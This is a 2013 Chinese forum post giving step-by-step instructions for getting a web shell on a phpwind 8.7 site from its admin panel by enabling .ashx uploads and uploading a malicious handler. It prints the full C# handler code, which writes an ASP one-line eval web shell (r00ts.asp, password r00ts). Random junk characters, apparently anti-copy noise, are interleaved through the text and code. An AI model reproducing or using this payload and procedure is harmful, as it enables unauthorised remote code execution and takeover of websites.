找回密码
 立即注册
查看: 3117|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小; o  Y  j3 L" I
  R) g" u- Z* J5 c* h! d  r3 y/ L
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
% p! Y; A2 w, X- i5 W4 j 8 h4 u. W& w& H
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
/ k' a# f: f9 z: \
/ f2 z0 V, h! a  @- W然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
8 u1 D; Z" W" \$ t2 n4 a6 V  D
1 I6 q: l1 Y" K6 x打开之后空白 会在目录底下生成r00ts.asp 密码r00ts, ?% m2 S0 `/ X- U
" R! n) Z- g% _0 s. d7 @1 f8 E* q
下面是代码:
! J1 Q7 z/ S* z( [
4 R$ m2 a, U. X' O& n<%@ WebHandler Language="C#"Class="Handler" %>
" [' d5 ?% Y# w3 x. Rusing System;0 h) f, S2 M0 R- q! P/ s! a( \" o
using System.Web;; {8 t+ ~, S8 i6 Q
using System.IO;
( ~$ Q$ Z3 w9 O) Zpublic class Handler : IHttpHandler {5 d$ o7 L( E. M0 j2 V. H
public void ProcessRequest (HttpContext context) {5 U% ]  `+ E  t; X' d
context.Response.ContentType = "text/plain";5 D5 \* ?/ o! z0 I+ F$ Y
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));6 P, V7 V: u; B
file1.Write("<%eval request(\"r00ts\")%>");2 _& u. B+ N) Q' I
file1.Flush();& Y% E! J4 ~6 [9 g1 E5 b4 |# i
file1.Close();
2 H: J& S8 m0 q& [}) U- ^2 {' l3 ^/ z) ?: l
public bool IsReusable {
" h0 T7 W" S3 F- Jget {# A" _2 c/ ^3 |6 s% D( W
return false;7 R# y; P6 o5 C( s& k  q, i! M
}
, ?2 `# \8 z# ?. \: ^" Y}
9 P9 k! D6 o" K3 ^2 E% L( H}
8 `! J. j5 C" P1 K5 k2 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表